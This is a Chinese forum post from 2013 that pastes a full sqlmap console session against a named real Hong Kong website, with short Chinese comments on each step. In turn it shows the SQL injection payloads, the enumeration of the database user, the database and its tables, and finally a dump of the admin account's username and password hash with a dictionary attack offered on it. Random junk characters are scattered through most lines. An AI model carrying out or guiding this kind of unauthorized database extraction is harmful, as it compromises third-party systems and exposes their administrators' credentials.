D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
4 D A% N1 d1 T# x' N3 _8 n# L* pms "Mysql" --current-user /* 注解:获取当前用户名称
! a2 e* o# _/ L. D sqlmap/0.9 - automatic SQL injection and database takeover tool2 W8 t9 J7 H3 }( t
http://sqlmap.sourceforge.net starting at: 16:53:548 v4 N% F7 |; q+ X5 d+ g
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( I! X& @2 X0 {+ r& ^
session file
8 Z: U8 F4 f% Y& Y# G[16:53:54] [INFO] resuming injection data from session file* y% Y9 D$ p1 @/ v2 v
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
0 C) s( G0 Z& Q# x9 I5 j! c. z7 u[16:53:54] [INFO] testing connection to the target url8 r+ ]; i* d0 R! P; ?
sqlmap identified the following injection points with a total of 0 HTTP(s) reque, z" G0 Y# ~0 N3 ?6 ?3 ?# @: O3 M
sts:2 [* [+ w1 B' \, a- ^) S o% B& z
---; @3 ]# ]7 U2 w
Place: GET( r2 Y) Z. Q) F. y. V
Parameter: id. U8 Y7 U" N# P1 ]1 ]& X$ T
Type: boolean-based blind
! J; X+ ]5 B- k3 k A% Q Title: AND boolean-based blind - WHERE or HAVING clause
( n+ P. r, Z) O. j' n Payload: id=276 AND 799=7995 L* J7 d5 Z; ~! |0 ?$ D" |; Q0 G
Type: error-based5 W( A. J0 ]) M# f2 Z2 N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 @! f* o6 x |3 i! t. q! D Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; z: U" B. X* H# Z1 ^9 r- A7 h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( b7 l( i5 _9 ]7 m+ w1 }
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)3 _( r- m- E& {6 O* ?1 X
Type: UNION query5 r5 W7 E8 M6 ]+ ?' A2 j6 i
Title: MySQL UNION query (NULL) - 1 to 10 columns
7 B1 y8 \+ M/ b8 ~$ ?; l% X/ v- ? H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 z8 w& | |% K6 f0 {' f% Q& F7 P(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% k3 q- O* M; \+ {8 p
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 V4 a% K! |; r0 k G, z
Type: AND/OR time-based blind
1 c' o! k0 \$ b) @8 L, D: I Title: MySQL > 5.0.11 AND time-based blind
8 d1 U2 ]. |% z. b7 W( h ?: Q Payload: id=276 AND SLEEP(5), v, b" T2 Y' u) J4 F
---* f# E! K0 M, C. X# m
[16:53:55] [INFO] the back-end DBMS is MySQL. P4 _$ u5 ~" j# I, T
web server operating system: Windows
2 |$ N ?' T1 O7 kweb application technology: Apache 2.2.11, PHP 5.3.0# Z( X+ U2 r6 Y% W5 [) ~; ~5 K5 v
back-end DBMS: MySQL 5.0
( B) k' I+ f1 ~; R[16:53:55] [INFO] fetching current user
1 [! ~$ l- D# a& Q/ f X+ W3 ycurrent user: 'root@localhost'
9 i! R6 e3 [: t, W1 L[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 t( F& Z8 L# t- m
tput\www.wepost.com.hk' shutting down at: 16:53:58% L( n1 q, q6 Y1 ~9 E1 G
+ i# t1 t8 z5 F
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 S8 ]! U. I/ Q8 B9 `5 K2 ]+ Y" k
ms "Mysql" --current-db /*当前数据库
: a: F6 k7 F4 a! d9 T4 h- j sqlmap/0.9 - automatic SQL injection and database takeover tool
; C/ q; m1 d& }' w/ w8 k http://sqlmap.sourceforge.net starting at: 16:54:16
; f% c0 e5 m* A- j$ c) r5 [[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as0 E0 G: A2 z o; c- m& b0 F; F
session file! Q" N! K7 C. Z& s. H* A. ]
[16:54:16] [INFO] resuming injection data from session file% b3 m$ t( S/ w- O
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* D' I5 _" k- x# K
[16:54:16] [INFO] testing connection to the target url
- K. t* I1 k4 p6 ]7 w3 u8 H/ K$ Ysqlmap identified the following injection points with a total of 0 HTTP(s) reque3 `# S0 S" a. D
sts:
) g/ _1 F1 y. Q/ ~. {---
5 L( |* F4 K) C) a# i% ePlace: GET
9 r& m' Q" z5 z: ~, i% aParameter: id6 V# d8 Q$ e" ]
Type: boolean-based blind; G4 T6 c' ~4 b# E; W6 z6 u
Title: AND boolean-based blind - WHERE or HAVING clause
! ]1 Q5 e0 G, _ Payload: id=276 AND 799=799; |2 r% p8 ]3 L
Type: error-based; A1 H4 N! {: \
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause b4 [: p2 _& |" F5 X7 Y p b
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 E% Q1 D3 I$ N3 E+ C120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,588 ` B4 M0 ]0 H5 o- ~
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ v+ @: a8 D1 D! ^$ X2 K9 X
Type: UNION query
$ L/ O. _( d# |3 Q8 Y/ v Title: MySQL UNION query (NULL) - 1 to 10 columns) o: C2 i9 x$ }/ o
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* N9 Z9 i r$ ^
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( x6 I7 \; U" K/ `' O- c6 kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## W* s0 M/ w" O: T. h
Type: AND/OR time-based blind2 @: S, t6 d0 n7 l; j% _
Title: MySQL > 5.0.11 AND time-based blind
5 }6 g$ f7 S& \" r Payload: id=276 AND SLEEP(5)0 m3 A) s- }$ P4 ]% [) \" S, N
---1 Z( E8 ^' e5 g; O8 L0 r5 y6 ?
[16:54:17] [INFO] the back-end DBMS is MySQL
* h t- u) u- I4 _5 q0 H0 z4 Zweb server operating system: Windows
, j; x' K0 }! X3 d6 Y. C5 V: ?9 }web application technology: Apache 2.2.11, PHP 5.3.0
* t3 H2 Z8 m- }( `/ Kback-end DBMS: MySQL 5.0
0 j" S0 @3 l' C[16:54:17] [INFO] fetching current database7 Q ~' d0 a2 ]) a$ U
current database: 'wepost'
* C8 L, ^ V4 ~, T6 u) p( Q[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou0 d* x! F% t, Z$ V6 [2 | ~
tput\www.wepost.com.hk' shutting down at: 16:54:18
/ }# J; X+ L- a( H6 ED:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) R0 V- E1 h. Tms "Mysql" --tables -D "wepost" /*获取当前数据库的表名! q' z) @+ a8 _3 l
sqlmap/0.9 - automatic SQL injection and database takeover tool2 ^# F( W% X0 m/ d1 C* u
http://sqlmap.sourceforge.net starting at: 16:55:25# N' N( S0 k6 u7 l- }
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
, G( A+ r! \! @" F: j session file1 ^: _2 B% O: i9 R7 E
[16:55:25] [INFO] resuming injection data from session file
5 j* G* G) f1 [3 Y[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file9 o7 c/ p2 x* y; J, g
[16:55:25] [INFO] testing connection to the target url. q/ C. p3 b. I
sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 f6 l! ], Y2 n" G1 B
sts:" R! W2 \& a1 N0 m, f$ @
---) v7 `8 R2 J+ U
Place: GET
. j' E+ d) r5 K3 B* [# l& }( QParameter: id; O- s( `/ }* ?) ]' j& Z/ |' W: a
Type: boolean-based blind
) w: X' r8 r+ u& S X2 y, V3 x Title: AND boolean-based blind - WHERE or HAVING clause
4 ~( d& {5 s9 l( ]( y Payload: id=276 AND 799=7991 u7 W3 @* _# J+ V% B
Type: error-based
0 E# |# n( _6 C, {3 H9 X4 n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 X d$ T) j! U5 f$ D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ g7 i/ A8 q) E4 x) G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! I6 o( g- o/ y8 t5 q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! |6 a+ W; l( M1 w" k! S/ x Type: UNION query# K4 Y3 b z1 ~
Title: MySQL UNION query (NULL) - 1 to 10 columns: i5 q" S/ R( h, V
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 d3 Y5 ?2 C% G
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: z- K& }. n& e1 d. w
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ [% r. ~/ h U8 D& v5 T Type: AND/OR time-based blind
, M: X0 @2 _, O: g. o3 P4 k Title: MySQL > 5.0.11 AND time-based blind
% V' e) H t: b- ^ Payload: id=276 AND SLEEP(5)" U) S9 E# n5 ]4 R/ g9 h
---
$ E1 d' g1 p) \; v$ f/ L[16:55:26] [INFO] the back-end DBMS is MySQL
7 s' P. T) d, U7 O. x* f Iweb server operating system: Windows
* `% N% X7 q' x( W5 P3 u# mweb application technology: Apache 2.2.11, PHP 5.3.0: p9 y' {. v; h% c& V f( F
back-end DBMS: MySQL 5.0
+ ]7 b3 s6 N+ i" b" z; i[16:55:26] [INFO] fetching tables for database 'wepost'! W3 P3 n' \5 s u% z4 e ~/ u V
[16:55:27] [INFO] the SQL query used returns 6 entries' ^+ A1 I3 ^9 }* l/ b
Database: wepost
; T9 Y8 m9 c: |2 R7 Y5 B/ Z[6 tables]" F- R+ }2 w8 a: P( b G
+-------------+
8 L7 ~' `+ _4 P& }: V+ F2 }( c* K| admin |
, `& E% {$ K u5 k# {| article |
H: f) W3 s3 J: L( h| contributor |
6 T9 W( U' b0 }| idea |5 Q; R0 _6 _' T
| image |2 Y% Z3 s2 Q! H6 }9 E
| issue |
6 x( `( v$ N0 W" R# y+-------------+& A" W, ?# J9 \2 W$ g+ J
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou+ ?7 I O$ c/ M0 u9 B
tput\www.wepost.com.hk' shutting down at: 16:55:33; X' W. K' ^6 E: l
0 Q3 P. T6 y7 ?2 @0 Q7 P
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ |$ {9 _/ a; ^$ O
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名) @0 n3 r7 s; _% q' Y( A
sqlmap/0.9 - automatic SQL injection and database takeover tool+ c+ n3 Y3 T) y J$ K
http://sqlmap.sourceforge.net starting at: 16:56:06
( L; s$ |# L8 o7 T* C, d1 v/ tsqlmap identified the following injection points with a total of 0 HTTP(s) reque
. o8 X0 d5 n# d) _! K+ L! k* ists:# F5 @% H: F. U8 E3 a
---( i0 R' x2 W; L+ S! g& u' i8 n. d
Place: GET& v: }4 }+ x( O* `, e2 X
Parameter: id
. k+ {3 l' g1 m8 ?4 ~5 t Type: boolean-based blind! H+ w$ ~, q8 B8 J% \
Title: AND boolean-based blind - WHERE or HAVING clause4 Z- p# V6 j) h
Payload: id=276 AND 799=799
* ^" o) B: e( n Type: error-based
* n l/ E; F8 G. K% X7 \ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 y x) Z" m/ q( a; ?7 _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 b! l8 V) J$ ~' W6 |+ P3 O5 ?. Q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 a8 s. b0 ~* C),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) u1 C( D. I1 \/ R: S: `' U. ~5 ^
Type: UNION query
2 O, n/ q: `. y T Title: MySQL UNION query (NULL) - 1 to 10 columns# E. e! ~* T' T$ g' {6 c, U" \
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 l4 j4 {$ t7 e& H
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
3 l9 `# q. ]$ ^% o7 L* ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
: E2 m" k* K6 t( X( Q+ M9 p Type: AND/OR time-based blind: \( m) U/ C. d, ~" _2 M
Title: MySQL > 5.0.11 AND time-based blind
8 M5 x4 O v4 T' O7 J8 u Payload: id=276 AND SLEEP(5)
, ]% m* R; Q9 S- q---
( e& J9 z9 G( i) aweb server operating system: Windows; Z' t% z* J* Q) P0 p" d5 M
web application technology: Apache 2.2.11, PHP 5.3.0: q9 f% H+ x. t" i, s
back-end DBMS: MySQL 5.0
# O$ q7 z+ D9 u7 J) g) e6 @[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se; t! J" Z5 C6 \
ssion': wepost, wepost
5 s! _5 g I" c2 U/ ODatabase: wepost3 E9 I* G: |7 e$ a2 _4 b+ |9 Y+ r
Table: admin
5 {) n& _1 W; h1 P' l! |[4 columns]( U) }8 n4 \6 L' M" B
+----------+-------------+/ s3 f P. }+ n1 \( c
| Column | Type |' Z$ S$ F% k: N. H
+----------+-------------+/ x# j0 W3 c x4 T! r d
| id | int(11) |; ^1 D5 ^) N5 s1 y+ t( r, T" F' ^
| password | varchar(32) |
- d! I2 a$ u; M* K6 T* i3 k1 n| type | varchar(10) |
2 Q. V7 v B$ ^4 e| userid | varchar(20) |% \) w7 ~0 X2 n6 G B! k) ?2 L
+----------+-------------+
0 o p! \1 X$ \/ g* { shutting down at: 16:56:19
4 H/ a; m) M9 G4 z A5 D( `
: u8 C( `; J5 {; t/ l# k) GD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, H& C8 V+ l9 P) w
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
5 _( k0 _) M8 W: E* x4 J sqlmap/0.9 - automatic SQL injection and database takeover tool
4 J: R" I- d! }, F B0 D http://sqlmap.sourceforge.net starting at: 16:57:14# O9 C$ O6 K9 |% ^6 p' [3 k/ u& Q5 e4 S
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
* a- k* @8 `. k1 r5 ^4 m% Ests:7 y, c7 y4 [# q4 [8 f
---3 {0 w! b2 F1 e8 S+ B: Y* v! t7 v! @
Place: GET
! a7 C4 Y" i' q8 \8 m6 fParameter: id x0 z6 {6 D% [. ~
Type: boolean-based blind9 j8 x0 s5 v7 k# l
Title: AND boolean-based blind - WHERE or HAVING clause
" E# v- Y b8 Y" P Payload: id=276 AND 799=7995 Q8 P/ Y: {) p
Type: error-based
5 y* J" o# a2 p Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [, d% o4 x3 V- y! O8 O$ L2 Z- l
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 j) R. u. q. O/ K$ m# D
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% ?8 k4 N8 q; q& e+ \
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) t: `; i% H) A3 C* }! w# R
Type: UNION query
& B( U; Q0 X% m# c" _/ @ Title: MySQL UNION query (NULL) - 1 to 10 columns
) f0 k8 l" B& V: x. y Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" ]) `7 I8 L! ?$ A(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 A. k X% {" ^* Y- `2 oCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 m: f* z, b& a5 i, a Type: AND/OR time-based blind
9 @* X) _0 X9 c# F Title: MySQL > 5.0.11 AND time-based blind
; \* x/ D% Z3 Z8 ~! T; K Payload: id=276 AND SLEEP(5)
. E! X9 b& W( G4 K/ Z---
6 z/ x% o4 `2 W" q' d4 _web server operating system: Windows8 |3 d1 q8 m2 ]$ z
web application technology: Apache 2.2.11, PHP 5.3.09 E& X9 F7 f" X+ i
back-end DBMS: MySQL 5.0
8 Z+ S* Q5 E! Frecognized possible password hash values. do you want to use dictionary attack o
$ w. `' E5 }6 j5 N3 ~. Nn retrieved table items? [Y/n/q] y
3 v( R( ?: K. D% o4 C, j& bwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
6 l' n5 V" r7 b7 y/ Q. ~2 q3 qdo you want to use common password suffixes? (slow!) [y/N] y
9 |! \$ [- ^; `Database: wepost7 J R; f J K5 d2 G' A8 [
Table: admin
; j8 p7 K# Y y# h[1 entry]
( q* d2 n* n' I2 L( z. o q+----------------------------------+------------+) k1 w4 Z& t" Q* `& h# Y+ J% S
| password | userid |
+ r% R4 y# h9 n5 l! ^+----------------------------------+------------+; R$ `4 I1 o2 r4 F
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* ^- v" o i8 \1 U; v4 c
+----------------------------------+------------+
9 N8 F* \. d# n2 ?* u shutting down at: 16:58:14: O8 n" x- W+ S9 |0 y& X
' g% f1 J1 m0 m+ Y SD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对